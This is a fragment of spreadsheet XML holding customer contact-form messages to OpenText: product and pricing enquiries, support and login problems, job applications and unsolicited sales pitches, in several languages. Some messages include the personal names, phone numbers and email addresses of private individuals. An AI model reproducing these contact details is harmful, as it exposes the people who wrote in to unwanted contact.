    <t>We have RightFax 9.4 on one of our servers and would like to know if we are entitled to any updates that would allow us to connect to SQL 2014, 9.4 doesn't seem to support this.</t>
  </si>
  <si>
    <t>I would like to be contacted in order to discuss OpenText products for accessing the DMS from mobile devices within the Blackberry container (Blackberry Dynamics platform).</t>
  </si>
  <si>
    <t>Request for quotation for Documentum 7.2 license and support.</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from London,_x000D_
_x000D_
My name is Rebecca from Pointr Labs and I am writing on behalf of our Chief Marketing Officer Axel Katalan. _x000D_
_x000D_
We are a tech company working with large airports such as Gatwick Airport and Dubai, as well as retail clients such as Harrods and IKEA and supply them with indoor location systems and digital engagement platforms. _x000D_
_x000D_
MAHB has informed us that OpenText was awarded the tender around their digital transformation - we see this as a great opportunity to collaborate. We'd like to talk with the responsible team on exploring this opportunity further. _x000D_
_x000D_
With kind regards,_x000D_
Rebecca Collins _x000D_
PA to CEO and CMO </t>
  </si>
  <si>
    <t xml:space="preserve">Hello there, _x000D_
_x000D_
We are leading company in Saudi Arabia seeking to utilize BPM automation solution, we are interested to discussed more about the solution that you are providing and how that might help our business goals. _x000D_
_x000D_
You can contact me for more details. _x000D_
_x000D_
_x000D_
Kind regards, _x000D_
Abdulaziz Alshahrani, _x000D_
Data Bank Systems Programmer_x000D_
Alsalam aerospace industries_x000D_
Cellphone: +966553740147_x000D_
</t>
  </si>
  <si>
    <t>FAO is evaluating solution for ECM/Document management</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, My company uses OpenText already as a document managment system.  I am looking to utilise the API to store documents straight from an application i am developing in C# ,  whenever I log in to try to access the supporting documentation on the API, it allows me to log in with my password but cannot actually access the documentation.  Are you able to assist me at all? </t>
  </si>
  <si>
    <t>We have been partners with EMC (DCTM) for years, and would like to build on the relationship with the team from OpenText. I also have some concerns that i would like to address._x000D_
_x000D_
Hope to hear back from you soon._x000D_
_x000D_
Regards,_x000D_
Firas</t>
  </si>
  <si>
    <t>I want to know if there is any opening for Fresher or any internship available at India location.</t>
  </si>
  <si>
    <t>Are there accommodations to get us from the airport to our hotel upon arrival?</t>
  </si>
  <si>
    <t>Seeking for job</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext Team_x000D_
_x000D_
I am a Collaboration technology Solutions Architect with Cisco System and I am working on a Collaboration solution design for Department of IP, Botswana. In our turn key project, we have requirements to position Fax-over-IP solution and to Integrate it with Cisco's Communications Manager. After a comparison study, we are convinced that Opentext's RightFax solution is the best fit to fulfill customer's requirements. _x000D_
_x000D_
I will appreciate if your Product or Services sales representatives could contact me so we can further explore the opportunity._x000D_
_x000D_
Best Regards_x000D_
Haroon Raees_x000D_
Cell: +966-55-4020640_x000D_
Email: haraees@cisco.com  </t>
  </si>
  <si>
    <t>I am opening to receive a newsletter that will be of interest to my readers.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
_x000D_
This is Praveen Kumar, I have completed my M.Tech(SE) in 2016 and also I have done the Dot Net Technology. Now I am looking to start my career with this Technology._x000D_
_x000D_
I hope you will provide a reference for me and I would like to work with any Location.</t>
  </si>
  <si>
    <t xml:space="preserve">There was a letter that stated the different changes in the invoices and the documents. Is there anything that the pharmacy has to do to ensure that this change is smoother? _x000D_
Is it possible to get a clarification of this statement? _x000D_
   "Your action: If your customer account number does change we ask that you please update the OpenText vendor information in your systems as necessary to avoid any payment delays" _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Exceed interest</t>
  </si>
  <si>
    <t>Trying to login to my account;  pearys  The complete first class login changed without notification and now I cant access it.  the hermon email is above, I have another that I can be reached at seeing as how I cant access that one.  kevinap@orono.org</t>
  </si>
  <si>
    <t>Inquiry about QRS Catalog.  Please send pricing. Thank you!</t>
  </si>
  <si>
    <t>Hello ... our company received a letter about some changes you are making, but we are having a problem identifying who here should receive it, and whether or not we even have any service from you. Can you contact me to let me know who you have as a contact for us and advise us what service, if any, that we have with you? Thank you! Michael R. Beard, digital director, Gainesville Times</t>
  </si>
  <si>
    <t>To better understand Brava OpenText for Microsoft redaction capabilities</t>
  </si>
  <si>
    <t>I have yet to receive the registration code from you. I submitted the .dat file several months ago</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get a demo of your DAM offering </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am contacting you on behalf of Majid Jowhari, Member of Parliament for Richmond Hill. _x000D_
_x000D_
As OpenText Corporation is involved in technology and product innovation, and has an office located in Richmond Hill, MP Jowhari is very interested in meeting with your executive team to get to know more about your company and its projects. Since MP Jowhari is a member of the Standing Committee on Industry, Science and Technology in Ottawa, he is looking to foster relations with businesses in related fields who are located in the riding to better represent your interests during Committee meetings and to aid in searching for possible federal funding opportunities. If this is of interest to your team, please contact us with your availabilities.  _x000D_
_x000D_
We look forward to hearing from you. _x000D_
_x000D_
Best,_x000D_
Ava Naraghi_x000D_
Member's Assistant_x000D_
Office of Majid Jowhari, MP_x000D_
Tel.: (905) 707-9701</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
I am filling out vendor set-up paperwork for Gordman's (Specialty Retailers Inc) and I have some questions regarding EDI.  We're already using your company for another of our customers and I assume we would be able to use you for this as well.  I am fairly new to EDI and I want to make sure I fill in our EDI capabilities correctly on the vendor set-up form.  Please call me at your earliest convenience so I can get this submitted to the customer.</t>
  </si>
  <si>
    <t>Hello;_x000D_
I'm checking on whether the application deadline has closed on a position still being posted for a Sr. Director Press and Influencer Relations for OpenText. I'm assuming, as I don't see it on your site, that the deadline has past, but wanted to confirm, in case the door is still open a crack to get a cover letter and CV in._x000D_
Thanks in advance for checking._x000D_
_x000D_
Thane Burnett_x000D_
thane.burnett@tc.tc_x000D_
Hm - 905-792-3982_x000D_
Cell - 902-293-7356</t>
  </si>
  <si>
    <t>Pricing for Cloud fax solution</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a scaleable enterprise DAM solution for a mid-sized university, internal client users only. </t>
  </si>
  <si>
    <t>Interested in fax solutions.</t>
  </si>
  <si>
    <t>We are currently getting problems using Exceed 15 software.  The connection times out and drops the link to the remote server.  As a result we have to re-connect each time we wan t to use the remote server and then restart the applications on the remote server.</t>
  </si>
  <si>
    <t>Unable to download virtual fax machine.  Page is blocked as my antivirus has labeled it a Trojan.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText HR Team,_x000D_
_x000D_
I hope this email finds you well. My name is Amélie Lemieux and I am a freelance translator working for different companies such as BlackOut Design, Tennis Canada, Alepin Gauthier, and several universities like McGill and Concordia. The breath of my work covers Eng-Fr/Fr-Eng translation and proofreading. I have also been asked to revise complete documents by my clients and always keeping the highest confidentiality measures._x000D_
_x000D_
_x000D_
I am writing you as I just walked by your Montreal office (I am in the neighborhood working at Café Mélisse) and thought I would contact you to see if you would be interested in my translation and proofreading services. If any of you is available to meet at any point, I would be happy to discuss in person projects that you need to have proofread or translated._x000D_
_x000D_
_x000D_
I am a very spontaneous person and I deliver my work on time. I invite you to have a quick look at my website to give you an idea of the projects I have been involved with. Vous pouvez également communiquer avec moi en français._x000D_
_x000D_
_x000D_
Smiles,_x000D_
_x000D_
Amélie Lemieux_x000D_
_x000D_
LinkedIn: https://www.linkedin.com/amelielemieux/_x000D_
Website: https://www.amelielemieux.com/translation/_x000D_
</t>
  </si>
  <si>
    <t>I could not find the support lifecycle of the Exceed product on your web site. I would like to know the end of support date of different versions of Exceed. We currently have Exceed versions 12, 14, and 15.</t>
  </si>
  <si>
    <t>I need consulting help to develop an EDI map for the GEIS Application Integrator product.</t>
  </si>
  <si>
    <t>I would like to purchase a copy of Brava Desktop.</t>
  </si>
  <si>
    <t>Our company has received several emails allegedly stemming from opentext. These emails regard the change of bankingpartner for GXS GmbH and contain a pdf attachement. As the mail looks very dubious I would like a confirmation that this email is legit, before changing data in our systems.</t>
  </si>
  <si>
    <t>to request a quote for : Open Text Report &amp; Output Management, Output Manager Interface for SAP  for AIX</t>
  </si>
  <si>
    <t>Compatibility with snaplock over Ontap 9.x</t>
  </si>
  <si>
    <t>Nachfrage mein Schreiben vom 22.06.2017, es ging um Frage nach Vertragskopie, Kunden-Nr: DE01-70410000 / Kundenreferenz: 8100361641._x000D_
Mit freundlichen Grüssen_x000D_
Ralf Stellmacher</t>
  </si>
  <si>
    <t xml:space="preserve">Goedemiddag Mevrouw, Heer, _x000D_
_x000D_
Ik ben op zoek naar de contactpersoon van Open Text Nederland voor Famed. Famed gebruikt Streamserve 5.6.1. We zijn bij Famed een aantal veranderingen aan het doorvoeren op ons applicatielandschap, wat zal inhouden dat we op termijn met Streamserve gaan stoppen. Nu loopt ons huidig support contract tot 30 november 2017. Dit zal voor ons nog te vroeg zijn om het support contract op te zeggen. 1 jaar verlengen is voor ons mogelijk weer te lang. Graag wil ik met de juiste persoon hierover even tijdens een gesprek van gedachten willen wisselen. _x000D_
</t>
  </si>
  <si>
    <t>I would like to have an access and an e- mail  (First class ID and password)</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are using HP Extream product(Dialogue) with version 8.0._x000D_
Can you please help me with below details -_x000D_
1) Is this version compatible with z/OS 1.13 ?_x000D_
2) Is this version still in support ?_x000D_
3) do we need upgrade to newer version ?_x000D_
4) do we have to apply maintenance ?_x000D_
5) If upgrade is need, do we get product package from vendor ?</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrter Herr Rheinfurth,_x000D_
_x000D_
wir haben am 06.07.2017 zwei Rechnungen von der Firma Open Text Software GmbH erhalten. Sie werden als Salesperson genannt._x000D_
Ist das korrekt? Wir haben keine Mitteilung erhalten, dass Firma Dell EMC erneut fusioniert hat._x000D_
_x000D_
Wir bitten um Rückmeldung._x000D_
Mit freundlichen Grüßen_x000D_
Im Auftrag_x000D_
_x000D_
Katrin Seifert_x000D_
Bundesanstalt für Materialforschung und –prüfung (BAM)_x000D_
_x000D_
Katrin Seifert_x000D_
Referat Z.5 - Beschaffung, Materialwirtschaft_x000D_
_x000D_
Unter den Eichen 87 _x000D_
12205 Berlin_x000D_
_x000D_
T: + 49 30 8104-2399_x000D_
F: + 49 30 8104-2145_x000D_
katrin.seifert@bam.de_x000D_
www.bam.de_x000D_
</t>
  </si>
  <si>
    <t>To the attention of Leslie Sarauer:_x000D_
Dear Leslie_x000D_
This is Carlos Pereira, from Spain._x000D_
Sorry for inconvenience but I have no updates on Senior Account Executive- Enterprise Software application Ref#: 15106  _x000D_
I wonder if you, as Senior Vice President, Human Resources, could speed it up since I´m pretty sure next lines will sound very interesting for you._x000D_
I come from a huge experience in the BSS sales market around EMEA, in deep Spain, France and Portugal. _x000D_
I´ve been involved in EMC tenders so I know quite well the market landscape and platforms from Hyland, Alfresco, etc._x000D_
I speak fluent English, French, Spanish and, holding Telecomm Engineer degree plus MBA._x000D_
I present immediate availability._x000D_
For other reasons I´ll be in London over the next week, I may meet someone from the firm in order to show  I´m a good candidate_x000D_
Hope hear from you soon_x000D_
Carlos</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
One of our customer who runs iManage Work as well as Liquid Office are about to upgrade their environment. _x000D_
_x000D_
We believe that we need a Liquid Office 2 node cluster license for 2 environments (UAT &amp; Prod) for 260 users._x000D_
It’s possible that they initially have a 50 + 260 license (or similar). In other words that they bought an initial 50 and then added on._x000D_
_x000D_
So, could you please give me the full picture of the Liquid Office licensing?_x000D_
_x000D_
Regards_x000D_
Marcus</t>
  </si>
  <si>
    <t>Hello, I am working with an SAP customer who uses OpenText. I would like to be able to access KBA's that are provided via SAP / OpenText incidents. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
I worked in ISE Cegos in France and was in charge of Gupta products for France until 2000 where I created JC² Informatique with Jacques Cabeza. At this time we were offering Gupta/Centura support, sales and training. We sold JC² Informatique to Precise Software Solutions in 2007._x000D_
I still have some SQLWindows/Team Developer applications I use every day._x000D_
I would like to transfert them to Teal Developer 6.2 or newerCan you tell me the price of a single developer installation ?_x000D_
Best regards_x000D_
Jérôme Cornut_x000D_
</t>
  </si>
  <si>
    <t>Hi. I’m Brian and I figured I’d reach out to you since we are both in the web development space. _x000D_
_x000D_
Just curious to see if you might need some help in regards to getting work done for your customers in a timely and reliable way?_x000D_
_x000D_
The reason I ask is because I understand the challenges that come with securing good, reliable and scalable people to do the hands-on design and development work required. _x000D_
_x000D_
Hopefully you don’t have this issue, but if you do…I feel it’s worth a shot for us to connect and see if we might be a good fit._x000D_
_x000D_
My operation is 100% white-label, communication is always on point, I have very reasonable wholesale rates and we work on a per-project-basis (helping you to eliminate unnecessary overhead expense and be more profitable). _x000D_
_x000D_
Hope to hear from you. _x000D_
_x000D_
Thanks in advance!</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
we have Trouble with the Login on www.opentext.com - we would like to download the open text Report builder Software._x000D_
Order Number: SRAG08232041_x000D_
_x000D_
Please Help._x000D_
Best Regards_x000D_
Dirk Roeltgen</t>
  </si>
  <si>
    <t>Hello,_x000D_
Hope you are doing well,_x000D_
_x000D_
If you need a website designed quickly &amp; don’t want to spend much, then our low cost web designing services are just ideal for you!_x000D_
Service we offer:_x000D_
_x000D_
• Web Design Services_x000D_
• Mobile Apps Development Services_x000D_
• Digital Marketing Services_x000D_
_x000D_
I would be glad to schedule a Skype / Phone call in order to discuss the project in detail.Please share your Skype ID / Phone Number._x000D_
_x000D_
Regards,_x000D_
Leesa_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Can OpenText provide MicroWay with Reseller pricing on Exceed TurboX? Any information we should be aware of? _x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Mark up will not open in Brava Desktop. Created by newer version...requires update. follow instruction link and get "Page not found"?</t>
  </si>
  <si>
    <t>Explore the options available from OpenText Cloud.</t>
  </si>
  <si>
    <t>Looking for EDI, HL7 and MFT solutions</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in owning a list of IT Professionals and other verticals industry?_x000D_
_x000D_
We provide you Complete contact details of :  CEO, President, CIOs/COOs/CTOs/CFOs/IT Directors/Director Of Technology, IT Manager, IT Specialist, IT Support, IT Analyst, IT Systems Analyst, IT Systems Engineer, IT Systems Manager, IT Development Manager, Network Specialist, Product Engineer, Project Manager, Security Architect, Senior Engineer, Senior System Administrator, Senior System Analyst, Senior Vice President, Application Developer/Engineer, Associate Configuration Mgmt. Engineer, BI Architect, Computer Applications Analyst, Computer Software Engineering Technologist, Data Manager, Database Analyst, Developer, Service Desk Supervisor, Software Developer, Software Engineer, Solutions Architect, Sr. Developer, Sr. Systems Engineer, System Admin, System Engineer, System Specialist, Systems Analyst / Software Developer, Systems Technician II, Technical Support Analyst, Web Applications Developer, Web Applications Technician, Windows Administrator and many more who might be interested from your concerned company._x000D_
_x000D_
If this is not your target industry, Kindly let me know your target criteria:_x000D_
_x000D_
Target Industry:_x000D_
Target Job Titles:_x000D_
Target Geography:_x000D_
_x000D_
Look forward to hear from you._x000D_
_x000D_
Regards,_x000D_
Kiyara James| Marketing  Manager|_x000D_
----------------------------------------------------------------------------------------------------------_x000D_
If you do not wish to receive further Emails Kindly reply with "Leave-Out".</t>
  </si>
  <si>
    <t>Please remove us from your mailing list:_x000D_
Super Feet In-Shoe Systems_x000D_
1820 Scout Pl_x000D_
Ferndale WA_x000D_
US 98248-8937_x000D_
_x000D_
We are not interested. Thank You</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to have more information about purchasing digital fax software license._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Information regarding GC Docs or similar product for use in a project in Jamaica. </t>
  </si>
  <si>
    <t>We are looking to get sales quotes for RightFax for integration with McKesson Paragon and McKesson One Content software._x000D_
We are a current RightFax customer with integration with OneContent.</t>
  </si>
  <si>
    <t>no response from a fax mail I submitted 3 times earlier today.</t>
  </si>
  <si>
    <t>Our organization is considering moving forward with OpenText Teamsite and I'd like to understand some features and integrations a bit better._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>In the RightFax application, is there a way to control for incoming SPAM meessages?</t>
  </si>
  <si>
    <t>We are unable to login to our account.  Account # US01­-102565_x000D_
_x000D_
We would like to login to see the NRF color codes.</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in auto-tagging capabilities of unstructured document.  Please contact me as I require more info for our assessment.  Thanks. </t>
  </si>
  <si>
    <t>Good afternoon, _x000D_
_x000D_
I am contacting you from Business Reporter at The Telegraph in relation to a campaign I have just started on "the Future of Supply Chains"._x000D_
_x000D_
I wanted to have a discussion with someone at  OpenText to learn about the work you do in the area and the impact it can have on the businesses that apply it._x000D_
_x000D_
If it was something relevant to the angle I was positioning the campaign - a series of informative interviews, highlighting the positive impacts optimising supply chains can have - I would also like to discuss possible involvement within this series. _x000D_
_x000D_
If somebody could contact me back either via this email address on either of my below numbers I would love to start this conversation. _x000D_
_x000D_
Kind regards,_x000D_
Lana Karakoullis</t>
  </si>
  <si>
    <t>We are looking at switching from RightFax to Fax2Mail and I would like more information on this. We would like to get an evaluation license so that we can begin testing the functionality. Please let me know what we need to do to get this going. Thanks!</t>
  </si>
  <si>
    <t>Would like to get information on licensing costs related to OpenText Gupta ACCELL/SQL and OpenText Gupta DataServer ELN 9.1.  Would also like to get information regarding possible consulting assistance to upgrading from an old version of Unify 4GL and the Unify Database (now OpenText Gupta products).</t>
  </si>
  <si>
    <t>looking for opentext quote/trial.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of MerlinOne Users?_x000D_
_x000D_
This list Contains Company name, Web address ,Contact name, Phone number, Email address, Title, physical address, City, State ,Zip Code, Country, Phone number, Fax Number, Employee size and last verified date._x000D_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Best Regards._x000D_
Julie Channing</t>
  </si>
  <si>
    <t>Hi - I'd like to chat with one of your London-based solution architects to understand how we might be able to develop a plugin between OpenText and RepKnight's BreachAlert dark web monitoring platform.  The concept would be alert OpenText customers if their documents were being leaked, marketed or sold on the dark web.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
_x000D_
I am writing from Park Hall hotel as you have recently this year started to use our venue - I believe you have bought out a local company GXS_x000D_
_x000D_
If you believe you will need Accommodation for the rest of the year we would be happy to set up a Corporate Rate that is fixed and discounted. This can book either arranged to be booked direct - or we can set the rate up with Carlson Wagonlit whom I believe you use for your travel._x000D_
_x000D_
If you feel this would be of benefit and you would like to discuss it further please just drop me an email or give me a ring - </t>
  </si>
  <si>
    <t xml:space="preserve">Conference series LLC cordially invites all participants across the globe to attend the 4th  International Conference on Big Data Analysis and Data Mining (Data Mining 2017) which is going to be held during September 07-08 in Paris, France to share the Future Technologies for Knowledge Discoveries in Data" and technology._x000D_
Data Mining 2017 brings together leading scientists, engineers, directors of companies in the field of ‘Big Data’ to exchange information on their latest research progress. The main theme of the conference is “Future Technologies for Knowledge Discoveries in Data" which covers a wide range of critically important sessions. _x000D_
Speaker and Delegate slots are available_x000D_
For more details: http://goo.gl/2K0JH9_x000D_
</t>
  </si>
  <si>
    <t>Check out our free software listing website http://www.wesuggestsoftware.com/_x000D_
_x000D_
You can add and promote your software for free of cost. You will get the following benefits for free without any charge._x000D_
_x000D_
1. Add Software with website link_x000D_
2. Add post about your software (general or promotional)_x000D_
3. Get unlimited visits (software buyers) to your website_x000D_
4. Leads or enquiry (Initial Stage)_x000D_
5. Free social media promotion (weekly updates about your product)_x000D_
6. Email marketing (Free email promotion to target audiences)_x000D_
 and many more.._x000D_
_x000D_
Dont miss the opportunity. Be the first one to add your software http://www.wesuggestsoftware.com/submit-software/_x000D_
_x000D_
Looking your post in website. Thanks._x000D_
_x000D_
--_x000D_
We suggests Software_x000D_
fb.com/wesuggestsoftware</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
J'aimerais avoir la programmation des formations inter-entreprises pour ce deuxieme semestre._x000D_
En fait j'aimerais beaucoup suivre les formation d'administration et developpements avancés. J'ai récemment suivi la formation Streamserve L'essentiel._x000D_
Pourriez-vous s'il vous plait me communiquer le calendrier des formations inter-entreprises?</t>
  </si>
  <si>
    <t>here in our company most of the employees are working as a contract. after 3 or it can be more years they will take to do permanent to maximum all emp. so i am working here as a contract</t>
  </si>
  <si>
    <t>Need training on Vendor Invoice Management (VIM) for SAP Solutions Consultant. Need to know the details like cost and available modes of training. You can also reach me on 9884474001.</t>
  </si>
  <si>
    <t>Sehr geehrter Herr Waida, _x000D_
_x000D_
Grund meiner Kontaktaufnahme ist, dass wir vom FC Bayern München unseren „Business Circle“ erweitern und hierfür geeignete Unternehmen suchen. Meine Aufgabe ist, diese Unternehmen zu finden._x000D_
Mein Anforderung ist immer, dass es für den FCB und natürlich auch für das Unternehmen Sinn macht und Vorteile bietet. _x000D_
_x000D_
Wir suchen Unternehmen sehr gezielt und Sie wurden von einem Mitglied des Business Circle vorgeschlagen als ausgezeichnetes Unternehmen. Nachdem mein Team und ich uns alles ein wenig angeschaut haben, muss ich beeindruckt zustimmen.  _x000D_
_x000D_
Der Einstieg in den Business Circle erfolgt über unsere Basketball Abteilung. _x000D_
Was genau der FC Bayern München Business Circle ist und alle weiteren Details würde ich gerne mit Ihnen persönlich bei einem Termin oder Mittagessen besprechen._x000D_
_x000D_
Wichtig ist, wir sprechen hier nicht über ein Sponsoring. _x000D_
_x000D_
Ich würde mich freuen, wenn Wir über das Thema einmal sprechen könnten und ich warte gespannt auf ein Feedback von Ihnen,_x000D_
_x000D_
Viele Grüße_x000D_
Timo Tretter_x000D_
Manager New Business_x000D_
FC Bayern München</t>
  </si>
  <si>
    <t>Hi - Do you have any implementation partners in Western Australia?  Thank you.</t>
  </si>
  <si>
    <t>HP Extsream Engine Service agreement ID: 107249232423,version: 8.0.312 64-bit and  Key Customer ID: LITTLEWO. We want to know the Expiry of the license and also End of service of this version.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi . I would like to get details on who  sales  Open Text licenses in Israel. I know I can acquire Licences from SAP , But would like to examine options to purchase Licences through Open Text directly. I would appreciate your help on that. Thanks </t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
ich bin seit einigen Tagen hier im Bereich Webanwendungen eingestellt und weil es noch gar keine Präsentation zum CMS WEM gibt soll diese nun erstellt werden._x000D_
_x000D_
Auf Ihrem Webauftritt kommt man von dieser Seite http://www.opentext.de/was-wir-tun/produkte/customer-experience-management/web-content-management nur zu einer englischen und eine Übersicht zu WEM habe.ich nicht gefunden._x000D_
_x000D_
Sicher haben Sie für Ihre vertrieblichen Aktivitäten bereits eine Präsentation, Datei, Flyer o.ä. und ich würde mich über die Bereitstellung / Zusendung freuen._x000D_
_x000D_
Vielen Dank.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Sir,_x000D_
This is Rs Graphics Bd. We have a big team of clipping path service .We are giving service since 2010 worldwide from Bangladesh. We have 70 more expert designers in our team in three shifts. We are giving 24/7 hours 365 days services. We know that you are the pioneer of clipping path sector or digital image editor. So my team is most interest to work with you. For reference please check my website and send me free trial (It’s FREE) for checking my services. If you want you can check our quality and services. If you stay satisfied to show my service then you continue to us. I hope you will be 100% satisfied to see my services._x000D_
_x000D_
Service Description_x000D_
***PHOTO EDITING ***_x000D_
 Image Enhancement_x000D_
 Photo Restoration_x000D_
 Image Cropping/ Resizing_x000D_
 Photo Correction_x000D_
 Wedding Photos_x000D_
 Wedding album Design_x000D_
 Brightness Works_x000D_
 Color works_x000D_
 Color change_x000D_
Object Remove_x000D_
_x000D_
**** BACKGROUND REMOVAL****_x000D_
 Background Change_x000D_
 Image Masking_x000D_
 Image Clipping Path_x000D_
 Image Cut-out_x000D_
Green Screen Removal_x000D_
_x000D_
***** RETOUCHING *****_x000D_
 Image/portrait Retouching_x000D_
Product Photo Retouching_x000D_
 Jewelry Photos_x000D_
****** ILLUSTRATOR WORK ******_x000D_
 Sketch to vector_x000D_
JPEG to vector_x000D_
_x000D_
We can edit:_x000D_
•         Raw photos: CR2, NEF, etc._x000D_
•         Normal photos: JPEG, PNG, PSD, TIFF, GIF, etc._x000D_
No matter if the pictures were taken with a Smartphone or a DSLR I can make them more beautiful._x000D_
We extensively do Photoshop editing jobs and we could help you to enhance/ you’re Photo/Image the way you want it._x000D_
_x000D_
We offers free trials up to three images to evaluate our guaranteed service quality to all clients. We will process the trial files completely free of charge._x000D_
_x000D_
Generally it will take at least 4 hours after files received._x000D_
_x000D_
 Web site    : www.rsgraphicsbd.com_x000D_
_x000D_
G-Mail      : rsbdtext@gmail.com/rsgraphicsbd@gmail.com_x000D_
_x000D_
Hotmail   : info@rsgraphicsbd.com/clippingpathworld@hotmail.com_x000D_
_x000D_
Skype      : rscpgraphics/clippingpathworld_x000D_
_x000D_
_x000D_
We are waiting for your kind feedback._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">突然のご連絡失礼いたします。	_x000D_
株式会社ユニラボの佐藤と申します。	_x000D_
	_x000D_
この度は、弊社サービス「アイミツ」のご紹介をしたく	_x000D_
ご連絡させて頂きました。	_x000D_
	_x000D_
「アイミツ」はビジネスマッチングサービスとして、	_x000D_
数多く業種・業界で3万5千件以上のご発注案案件を扱ってまいりました。	_x000D_
	_x000D_
直近では、おかげさまで依頼総額が300億円を突破し、	_x000D_
多くのメディアにもご掲載頂きました。	_x000D_
	_x000D_
▼日経産業新聞	_x000D_
http://imitsu.jp/file/nikkei0902.pdf	_x000D_
	_x000D_
▼THE BRIDGE	_x000D_
http://thebridge.jp/2016/09/imitsu	_x000D_
	_x000D_
つきましては、貴社において新規の案件集客にお悩みはございませんでしょうか。	_x000D_
弊社受注パートナー様におかれましては、以下3つの点で、	_x000D_
貴社の集客を強力にサポートさせて頂けます。	_x000D_
	_x000D_
1.精度の高い案件精査	_x000D_
2.2,000件の案件の中からぴったりの案件を紹介	_x000D_
3.5,000社分の営業ノウハウによって営業を強力にサポート	_x000D_
	_x000D_
以下がアイミツの参考資料となりますので合わせてご確認ください。	_x000D_
	_x000D_
▼アイミツご利用参考資料▼	_x000D_
http://uc.imitsu.jp/7473440bbef94f3c_x000D_
	_x000D_
	_x000D_
少しでもご興味などございましたら	_x000D_
まずはお電話にて詳細をご説明差し上げたく存じます。	_x000D_
	_x000D_
お手数ではございますがご予定をご確認いただき	_x000D_
ご都合のよろしい日時をご教示いただけますと幸いです。	_x000D_
	_x000D_
【日時候補】		_x000D_
7月 7日（金）13時～18時_x000D_
7月10日（月）13時～18時_x000D_
7月11日（火）13時～18時_x000D_
7月12日（水）13時～18時_x000D_
7月13日（木）13時～18時_x000D_
_x000D_
_x000D_
	_x000D_
ご多用の中恐縮ではございますが	_x000D_
ご確認のほどよろしくお願いいたします。	_x000D_
	_x000D_
ご不明な点などございましたらお気兼ねなくお申し付けください。	_x000D_
何卒よろしくお願いいたします。	_x000D_
</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I am looking to access OpenText Vendor Invoice Management for SAP Solutions 7.5 SP6 - Installation Guide English (VIM070500-06-IGD-EN-1)'  but dont have access to the knowledge center.I need to implement the Opentect VIM for one of the client in Australia.Is it possible for me to get the installation guide?_x000D_
_x000D_
Regards,_x000D_
Rupak Majumder</t>
  </si>
  <si>
    <t xml:space="preserve">Need to get access to Converse Catalog. It was owned by Pat cuddi and she is no more with the company. Need to get the roles transitioned. Let us know what are the requirements to get access to the GXS catalog, so that we would be able to add and manage the customer support users </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my name is Henry, my manager of Coslo pharmacy is looking for a new way to use fax through the computer. </t>
  </si>
  <si>
    <t xml:space="preserve">Does the Suite 16 upgrade make any changes to stub settings in Retention and Disposal? I'm hoping that either globally or individually users will be able to chose to hide or reveal stubs of deleted items. Have any changes in Suite 16 been made that will now make this possible?_x000D_
_x000D_
Many thanks, _x000D_
Tania </t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
One of our e-commerce customers is switching to GDSN. I am looking for quotes from potential GDSN solutions providers._x000D_
_x000D_
Sincerely,_x000D_
Meghan</t>
  </si>
  <si>
    <t xml:space="preserve">Pricing for the following software:_x000D_
Documentum Content Server	6.7/7.1 o higher_x000D_
Documentum XML Transformation Services	6.7/7.1 o higher_x000D_
Documentum Administrator	6.7/7.1 o higher_x000D_
Documentum Document Transformation Service	6.7/7.1 o higher_x000D_
Documentum Process Engine	6.7/7.1 o higher_x000D_
Documentum Process Integrator	6.7_x000D_
Documentum Retention Policy Services	6.7/7.1_x000D_
Documentum TaskSpace	6.7_x000D_
Documentum WebTop	6.7/7.1 o higher_x000D_
Documentum WebTop Language pack Español	6.7/7.1 o higher_x000D_
Documentum ImputAccel	6.5/7.5_x000D_
Documentum D2	4.5_x000D_
Documentum XCP	2.1 or higher_x000D_
Documentum Composer	6.7 or higher_x000D_
Documentum Xplore	1.4_x000D_
Documentum Records Manager	6.8_x000D_
_x000D_
thanks </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam_x000D_
_x000D_
_x000D_
Vanilla Consultancy is the growing executive search firm which provides complete recruitment solution. We offer a quality of HR solutions service that will surpass our client's expectations. Our service starts with building up relationship with the client and working on focused and well-defined job profiles to get the right person. We provide superior value added HR solution within strict time constraints to offer maximum benefits to our client’s._x000D_
Our firm has excellent database of professional in the GTA location from the field of IT, Engineers, Marketing, Accounts human resources and other fields. The database is reviewed, revise and updated constantly. In short, there is an entire candidate pool that you may not have access to through your normal means of posting and ads._x000D_
_x000D_
To minimize your time span and speedy process in recruiting personnel you may require an assistance of good HR Consultancy to fulfill all your requirements. We therefore, wish to introduce ourselves as one of the growing professional HR solution service division._x000D_
 Introductory Offer “First free recruit”!!!_x000D_
At Vanilla Consulting we are happy to provide you with first free recruit to value continuing relationship and for our clients to be satisfied with our services. _x000D_
